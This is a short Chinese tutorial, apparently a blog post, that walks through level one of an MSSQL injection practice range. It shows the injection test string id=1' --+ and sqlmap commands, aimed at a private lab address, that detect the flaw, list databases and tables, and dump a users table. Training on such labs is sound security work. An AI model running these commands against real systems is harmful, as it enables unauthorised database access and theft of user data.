MSSQL 工具注入(第一关)

简介

SQL注入是一种安全漏洞,通过它可以执行意外的SQL命令或访问数据库中的信息。MSSQL注入通常发生在应用程序将用户输入作为SQL查询的一部分执行时,而没有对输入进行适当的验证或清理。

以下是MSSQL手工注入的流程:

一、打开靶场选择第一关

二、确定注入点

测试不同的闭合方式

这里确定为 id=1' --+

三、查找是否存在 sql 漏洞

使用语句 sqlmap -u http://192.168.213.200/less-1.asp?id=1 ,在kali在输入语句,确定存在 sql 漏洞

四、查找库名

使用语句 sqlmap -u http://192.168.213.200/less-1.asp?id=1 --dbs --batch

五、查找表名

使用语句 sqlmap -u http://192.168.213.200/less-1.asp?id=1 -D test --tables --batch

六、得到表中的数据

使用语句 sqlmap -u http://192.168.213.200/less-1.asp?id=1 -D test -T users --dump --batch

安全

网络安全靠人民,网络安全为人民

相关推荐
Double Point11 分钟前
(三十三)Dart 中使用 Pub 包管理系统与 HTTP 请求教程
网络·网络协议·http
数据智能老司机2 小时前
CockroachDB权威指南——SQL调优
数据库·分布式·架构
数据智能老司机2 小时前
CockroachDB权威指南——应用设计与实现
数据库·分布式·架构
数据智能老司机2 小时前
CockroachDB权威指南——CockroachDB 模式设计
数据库·分布式·架构
数据智能老司机21 小时前
CockroachDB权威指南——CockroachDB SQL
数据库·分布式·架构
数据智能老司机21 小时前
CockroachDB权威指南——开始使用
数据库·分布式·架构
松果猿1 天前
空间数据库学习(二)—— PostgreSQL数据库的备份转储和导入恢复
数据库
无名之逆1 天前
Rust 开发提效神器:lombok-macros 宏库
服务器·开发语言·前端·数据库·后端·python·rust
s9123601011 天前
rust 同时处理多个异步任务
java·数据库·rust
大丈夫立于天地间1 天前
ISIS协议中的数据库同步
运维·网络·信息与通信